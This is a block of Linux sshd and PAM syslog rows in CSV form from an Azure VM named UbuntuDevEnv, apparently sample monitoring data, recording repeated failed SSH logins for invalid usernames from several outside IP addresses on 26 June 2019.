+18165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:04,UbuntuDevEnv,2019-06-26 09:40:04,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 33315:11: Bye Bye [preauth],73968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,33315,,
+18166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:04,UbuntuDevEnv,2019-06-26 09:40:04,auth,UbuntuDevEnv,info,Disconnected from invalid user timemachine 115.159.216.187 port 33315 [preauth],73968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,timemachine,115.159.216.1,33315,,
+18167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:15,UbuntuDevEnv,2019-06-26 09:40:14,auth,UbuntuDevEnv,info,Invalid user q3server from 176.31.43.255 port 36948,74025,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,q3server,176.31.43.2,36948,,
+18168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:15,UbuntuDevEnv,2019-06-26 09:40:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,74025,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+18169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:15,UbuntuDevEnv,2019-06-26 09:40:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74025,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:17,UbuntuDevEnv,2019-06-26 09:40:16,auth,UbuntuDevEnv,info,Failed password for invalid user q3server from 176.31.43.255 port 36948 ssh2,74025,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,q3server,176.31.43.2,36948,,
+18171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:17,UbuntuDevEnv,2019-06-26 09:40:16,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 36948:11: Bye Bye [preauth],74025,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,36948,,
+18172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:17,UbuntuDevEnv,2019-06-26 09:40:16,auth,UbuntuDevEnv,info,Disconnected from invalid user q3server 176.31.43.255 port 36948 [preauth],74025,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,q3server,176.31.43.2,36948,,
+18173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:27,UbuntuDevEnv,2019-06-26 09:40:27,auth,UbuntuDevEnv,info,Invalid user t7inst from 176.31.202.90 port 57020,74073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,t7inst,176.31.202.9,57020,,
+18174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:27,UbuntuDevEnv,2019-06-26 09:40:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:27,UbuntuDevEnv,2019-06-26 09:40:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,74073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:29,UbuntuDevEnv,2019-06-26 09:40:29,auth,UbuntuDevEnv,info,Failed password for invalid user t7inst from 176.31.202.90 port 57020 ssh2,74073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,t7inst,176.31.202.9,57020,,
+18177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:29,UbuntuDevEnv,2019-06-26 09:40:29,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 57020:11: Bye Bye [preauth],74073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,57020,,
+18178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:29,UbuntuDevEnv,2019-06-26 09:40:29,auth,UbuntuDevEnv,info,Disconnected from invalid user t7inst 176.31.202.90 port 57020 [preauth],74073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,t7inst,176.31.202.9,57020,,
+18179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:05,UbuntuDevEnv,2019-06-26 09:41:04,auth,UbuntuDevEnv,info,Invalid user testcf from 165.22.203.187 port 57736,74199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testcf,165.22.203.1,57736,,
+18180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:05,UbuntuDevEnv,2019-06-26 09:41:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:05,UbuntuDevEnv,2019-06-26 09:41:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,74199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+18182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:07,UbuntuDevEnv,2019-06-26 09:41:06,auth,UbuntuDevEnv,info,Failed password for invalid user testcf from 165.22.203.187 port 57736 ssh2,74199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testcf,165.22.203.1,57736,,
+18183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:07,UbuntuDevEnv,2019-06-26 09:41:06,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 57736:11: Bye Bye [preauth],74199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,57736,,
+18184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:07,UbuntuDevEnv,2019-06-26 09:41:06,auth,UbuntuDevEnv,info,Disconnected from invalid user testcf 165.22.203.187 port 57736 [preauth],74199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testcf,165.22.203.1,57736,,
+18185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:19,UbuntuDevEnv,2019-06-26 09:41:18,auth,UbuntuDevEnv,info,Invalid user hk from 187.6.249.142 port 59784,74253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hk,187.6.249.1,59784,,
+18186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:19,UbuntuDevEnv,2019-06-26 09:41:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,74253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:19,UbuntuDevEnv,2019-06-26 09:41:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:22,UbuntuDevEnv,2019-06-26 09:41:21,auth,UbuntuDevEnv,info,Failed password for invalid user hk from 187.6.249.142 port 59784 ssh2,74253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hk,187.6.249.1,59784,,
+18189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:22,UbuntuDevEnv,2019-06-26 09:41:21,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 59784:11: Bye Bye [preauth],74253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,59784,,
+18190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:22,UbuntuDevEnv,2019-06-26 09:41:21,auth,UbuntuDevEnv,info,Disconnected from invalid user hk 187.6.249.142 port 59784 [preauth],74253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hk,187.6.249.1,59784,,
+18191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:39,UbuntuDevEnv,2019-06-26 09:41:38,auth,UbuntuDevEnv,info,Invalid user earthdrilling from 176.31.43.255 port 46486,74320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,176.31.43.2,46486,,
+18192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:39,UbuntuDevEnv,2019-06-26 09:41:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:39,UbuntuDevEnv,2019-06-26 09:41:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,74320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+18194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:40,UbuntuDevEnv,2019-06-26 09:41:39,auth,UbuntuDevEnv,info,Failed password for invalid user earthdrilling from 176.31.43.255 port 46486 ssh2,74320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,176.31.43.2,46486,,
+18195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:40,UbuntuDevEnv,2019-06-26 09:41:39,auth,UbuntuDevEnv,info,Disconnected from invalid user earthdrilling 176.31.43.255 port 46486 [preauth],74320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,176.31.43.2,46486,,
+18196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:40,UbuntuDevEnv,2019-06-26 09:41:39,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 46486:11: Bye Bye [preauth],74320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,46486,,
+18197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:51,UbuntuDevEnv,2019-06-26 09:41:50,auth,UbuntuDevEnv,info,Invalid user marta from 115.159.216.187 port 41323,74363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marta,115.159.216.1,41323,,
+18198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:51,UbuntuDevEnv,2019-06-26 09:41:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,74363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:51,UbuntuDevEnv,2019-06-26 09:41:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:52,UbuntuDevEnv,2019-06-26 09:41:52,auth,UbuntuDevEnv,info,Failed password for invalid user marta from 115.159.216.187 port 41323 ssh2,74363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marta,115.159.216.1,41323,,
+18201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:52,UbuntuDevEnv,2019-06-26 09:41:52,auth,UbuntuDevEnv,info,Disconnected from invalid user marta 115.159.216.187 port 41323 [preauth],74363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marta,115.159.216.1,41323,,
+18202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:52,UbuntuDevEnv,2019-06-26 09:41:52,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 41323:11: Bye Bye [preauth],74363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,41323,,
+18203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:58,UbuntuDevEnv,2019-06-26 09:41:57,auth,UbuntuDevEnv,info,Invalid user testcf from 176.31.202.90 port 45594,74392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testcf,176.31.202.9,45594,,
+18204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:58,UbuntuDevEnv,2019-06-26 09:41:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:58,UbuntuDevEnv,2019-06-26 09:41:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,74392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:59,UbuntuDevEnv,2019-06-26 09:41:59,auth,UbuntuDevEnv,info,Failed password for invalid user testcf from 176.31.202.90 port 45594 ssh2,74392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testcf,176.31.202.9,45594,,
+18207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:59,UbuntuDevEnv,2019-06-26 09:41:59,auth,UbuntuDevEnv,info,Disconnected from invalid user testcf 176.31.202.90 port 45594 [preauth],74392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testcf,176.31.202.9,45594,,
+18208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:41:59,UbuntuDevEnv,2019-06-26 09:41:59,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 45594:11: Bye Bye [preauth],74392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,45594,,
+18209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:42:32,UbuntuDevEnv,2019-06-26 09:42:32,auth,UbuntuDevEnv,info,Invalid user amwambogo from 165.22.203.187 port 51856,74513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,165.22.203.1,51856,,
+18210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:42:32,UbuntuDevEnv,2019-06-26 09:42:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,74513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+18211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:42:32,UbuntuDevEnv,2019-06-26 09:42:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:42:34,UbuntuDevEnv,2019-06-26 09:42:33,auth,UbuntuDevEnv,info,Failed password for invalid user amwambogo from 165.22.203.187 port 51856 ssh2,74513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,165.22.203.1,51856,,
+18213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:42:34,UbuntuDevEnv,2019-06-26 09:42:33,auth,UbuntuDevEnv,info,Disconnected from invalid user amwambogo 165.22.203.187 port 51856 [preauth],74513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,165.22.203.1,51856,,
+18214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:42:34,UbuntuDevEnv,2019-06-26 09:42:33,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 51856:11: Bye Bye [preauth],74513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,51856,,
+18215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:05,UbuntuDevEnv,2019-06-26 09:43:04,auth,UbuntuDevEnv,info,Invalid user t7inst from 176.31.43.255 port 57010,74633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,t7inst,176.31.43.2,57010,,
+18216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:05,UbuntuDevEnv,2019-06-26 09:43:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:05,UbuntuDevEnv,2019-06-26 09:43:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,74633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+18218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:07,UbuntuDevEnv,2019-06-26 09:43:07,auth,UbuntuDevEnv,info,Failed password for invalid user t7inst from 176.31.43.255 port 57010 ssh2,74633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,t7inst,176.31.43.2,57010,,
+18219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:07,UbuntuDevEnv,2019-06-26 09:43:07,auth,UbuntuDevEnv,info,Disconnected from invalid user t7inst 176.31.43.255 port 57010 [preauth],74633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,t7inst,176.31.43.2,57010,,
+18220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:07,UbuntuDevEnv,2019-06-26 09:43:07,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 57010:11: Bye Bye [preauth],74633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,57010,,
+18221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:15,UbuntuDevEnv,2019-06-26 09:43:14,auth,UbuntuDevEnv,info,Invalid user vpn from 187.6.249.142 port 48450,74673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vpn,187.6.249.1,48450,,
+18222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:15,UbuntuDevEnv,2019-06-26 09:43:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,74673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:15,UbuntuDevEnv,2019-06-26 09:43:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:16,UbuntuDevEnv,2019-06-26 09:43:16,auth,UbuntuDevEnv,info,Failed password for invalid user vpn from 187.6.249.142 port 48450 ssh2,74673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vpn,187.6.249.1,48450,,
